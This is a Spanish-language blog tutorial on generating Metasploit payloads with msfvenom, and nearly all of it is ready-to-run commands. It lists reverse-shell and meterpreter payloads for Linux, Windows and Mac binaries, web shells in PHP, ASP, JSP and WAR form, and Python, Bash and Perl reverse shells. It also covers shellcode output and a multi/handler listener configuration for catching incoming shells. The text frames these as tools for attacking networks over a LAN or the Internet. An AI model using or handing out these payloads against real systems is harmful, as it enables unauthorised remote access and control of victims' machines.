Explotación

Cómo Crear un Payload Metasploit

A menudo, una de las habilidades más útiles y subestimadas por el principiante de Metasploit es el módulo msfpayload. Se pueden crear múltiples payloads con este módulo y ayudar a que pueda darle un shell en casi cualquier situación. Para cada uno de estos payloads, puede acceder a msfconsole y seleccionar exploit/multi/ handler. Ejecute ‘establecer payloads’ para los payloads relevantes utilizados y configurar todas las opciones necesarias (LHOST, LPORT, etc.).

Para los ejemplos a continuación es bastante explicativo, pero LHOST debe completarse con su dirección IP (LAN IP si ataca dentro de la red, WAN IP si ataca a través de Internet), y LPORT debe ser el puerto que desea volver a conectar.

LISTA DE PAYLOADS DISPONIBLE
msfvenom -l
PAYLOADS BINARIE

2.1 Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f elf > shell.elf

2.2 Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f exe > shell.exe

2.3 Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f macho > shell.macho
PAYLOADS WEB

3.1 PHP

msfvenom -p php/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -e php/base64 R > shell.php

Como el archivo se ha codificado con base64, no olvide abrirlo con su editor de texto favorito y agregar “<?php” en la parte superior y “?>php” al final.

3.2 ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f asp > shell.asp

3.3 JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f raw > shell.jsp

3.4 WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f war > shell.war
SCRIPTING PAYLOADS

4.1 Python

msfvenom -p cmd/unix/reverse_python LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f raw > shell.py

4.2 Bash

msfvenom -p cmd/unix/reverse_bash LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f raw > shell.sh

4.3 Perl

msfvenom -p cmd/unix/reverse_perl LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f raw > shell.pl
SHELLCODE PAYLOADS

Para todos los shellcode, consulte ‘msfvenom -help-formats’ para obtener información sobre los parámetros válidos. Msfvenom dará salida al código que se puede cortar y pegar en este idioma para sus exploits.

5.1 Shellcode basado en Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f "LANGUAGE"

5.2 Shellcode basado en Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f "LANGUAGE"

5.3 Shellcode basado en Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f "LANGUAGE"
CREAR CONTROLADORES

Los controladores de Metasploit pueden ser excelentes para configurar rápidamente Metasploit para que esté en condiciones de recibir sus Shell entrantes. Los controladores deben estar en el siguiente formato.

msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 0.0.0.0
msf exploit(multi/handler) > set PAYLOAD 
msf exploit(multi/handler) > set LHOST 
msf exploit(multi/handler) > set LPORT 
msf exploit(multi/handler) > set ExitOnSession false
msf exploit(multi/handler) > exploit -j -z
USAR PAYLOADS PERZONALIZADO

Metasploit te permite generar payloads y usarlos durante un ataque. Para usar esta función, simplemente genere su Payload antes de ejecutar su ataque y una vez que haya terminado, use “payload/generic/custom” para especificar el payload a usar.

msfconsole
msf > use  payload/generic/custom
msf payload(custom) > show options
# show and set options ...
msf payload(custom) > set PAYLOADFILE /path/to/the/payload
msf payload(custom) > set PAYLOADSTR the_payload_string_to_use

Related Posts

Cómo Crear un Reverse Shell

dotweak@admin

Leave a Comment